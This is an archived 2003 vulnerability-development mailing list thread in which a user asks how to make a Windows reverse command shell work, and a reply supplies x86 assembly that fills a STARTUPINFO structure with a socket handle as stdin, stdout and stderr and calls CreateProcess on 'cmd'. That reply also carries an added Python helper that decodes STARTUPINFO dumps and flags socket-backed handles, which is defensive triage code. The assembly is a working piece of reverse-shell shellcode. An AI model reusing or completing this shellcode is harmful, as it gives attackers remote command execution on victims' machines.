Vulnerability Development mailing list archives

Re: Windows reverse Shell


From: "sk" <sk () scan-associates net>
Date: Wed, 5 Feb 2003 00:42:54 +0800

If I remember correctly, that shellcode doesn't have a "bind" function. A reverse
connect shellcode doesn't need "bind". WSASocket() will return a
non-overlapping socket, so it can be used as the in/out/err handler in
CreateProcess(); there is really nothing extra you need to do. Since you got
a connection in your nc, the problem should be in your CreateProcess(). Try
to check if your StartupInfo flags have STARTF_USESTDHANDLES.

I don't have C code for this, but in asm, it could be something like this:

;ebx = socket
xor         ecx,ecx
mov         cl,11h
push        edi
mov         edi,ebp
rep stos    dword ptr [edi] ;zero up startupinfo
pop         edi
mov         byte ptr [ebp],44h     ;STARTUPINFO size
mov         dword ptr [ebp+3Ch],ebx     ;output handler
mov         dword ptr [ebp+38h],ebx     ;input handler
mov         dword ptr [ebp+40h],ebx     ;error handler
mov         word ptr [ebp+2Ch],0101h
;STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea         eax,[ebp+44h]
push        eax
push        ebp
push        ecx
push        ecx
push        ecx
inc         ecx
push        ecx
dec         ecx
push        ecx
push        ecx
push        esi  ;"cmd",0
push        ecx
call        dword ptr [edi-28] ;CreateProcess

sk
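As an added example (not sk's or Litchfield's code), a small Python decoder for the 32-bit STARTUPINFOA block the asm above fills in, the kind of helper used when triaging a debugger snapshot or memory dump: it checks the offsets the shellcode stores to against the SDK field layout and flags the pattern a defender looks for, STARTF_USESTDHANDLES set with stdin, stdout and stderr all pointing at one handle. The field layout is from the Win32 SDK; the sample bytes are constructed, and the socket value 0x1C8 is an assumption.

```python
import struct

# 32-bit STARTUPINFOA: 12 DWORDs, 2 WORDs, 4 DWORDs = 68 (0x44) bytes.
# Field order follows the Win32 SDK declaration.
_FMT = "<12L2H4L"
_FIELDS = ("cb", "lpReserved", "lpDesktop", "lpTitle", "dwX", "dwY",
           "dwXSize", "dwYSize", "dwXCountChars", "dwYCountChars",
           "dwFillAttribute", "dwFlags", "wShowWindow", "cbReserved2",
           "lpReserved2", "hStdInput", "hStdOutput", "hStdError")
STARTF_USESHOWWINDOW = 0x001
STARTF_USESTDHANDLES = 0x100


def parse_startupinfo(blob: bytes) -> dict:
    """Decode a 68-byte STARTUPINFOA snapshot into a field dict."""
    if len(blob) < struct.calcsize(_FMT):
        raise ValueError("need %d bytes" % struct.calcsize(_FMT))
    return dict(zip(_FIELDS, struct.unpack_from(_FMT, blob)))


def socket_backed_std_handles(si: dict) -> bool:
    """Triage heuristic: STARTF_USESTDHANDLES is set and all three
    standard handles are the same non-zero value. A normal console or
    pipe setup uses distinct handles; one shared handle for in/out/err
    is the signature of the WSASocket-as-stdio trick. Confirm the handle
    type (e.g. \\Device\\Afd) before calling it a socket."""
    handles = (si["hStdInput"], si["hStdOutput"], si["hStdError"])
    return (bool(si["dwFlags"] & STARTF_USESTDHANDLES)
            and handles[0] != 0 and len(set(handles)) == 1)


def startupinfo_as_written_by_shellcode(sock: int) -> bytes:
    """Constructed sample: reproduce the stores the asm makes at ebp
    (cb=0x44, handles at +0x38/+0x3C/+0x40, flags word at +0x2C)."""
    buf = bytearray(0x44)                    # rep stos zeroes 0x11 dwords
    buf[0] = 0x44                            # mov byte ptr [ebp],44h
    struct.pack_into("<L", buf, 0x3C, sock)  # output handle
    struct.pack_into("<L", buf, 0x38, sock)  # input handle
    struct.pack_into("<L", buf, 0x40, sock)  # error handle
    struct.pack_into("<H", buf, 0x2C, 0x0101)  # USESTDHANDLES|USESHOWWINDOW
    return bytes(buf)


if __name__ == "__main__":
    si = parse_startupinfo(startupinfo_as_written_by_shellcode(0x1C8))
    print(hex(si["dwFlags"]), hex(si["hStdOutput"]),
          socket_backed_std_handles(si))
```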
----- Original Message -----
From: "NetNinja" <netninja () hotmail kg>
To: <vuln-dev () securityfocus com>
Sent: Tuesday, February 04, 2003 3:37 AM
Subject: Windows reverse Shell


Hello guys,

David Litchfield in his Blackhat talk talked about using the socket handle
from WSASocket() and passing that handle as the parameter for stdin, stdout
and stderr to the CreateProcess function. By doing it this way his reverse
cmd shellcode becomes much smaller. I tried coding that reverse
command shell in C, but couldn't get it to work. It simply connects to
my listening netcat listener and then disconnects. David Litchfield
used 4 functions to achieve that: WSASocket, bind, connect and
CreateProcess. A little help would be appreciated on building this reverse
cmd shell. Thanks.


--
Best regards,
 Adik                         mailto:netninja () hotmail kg

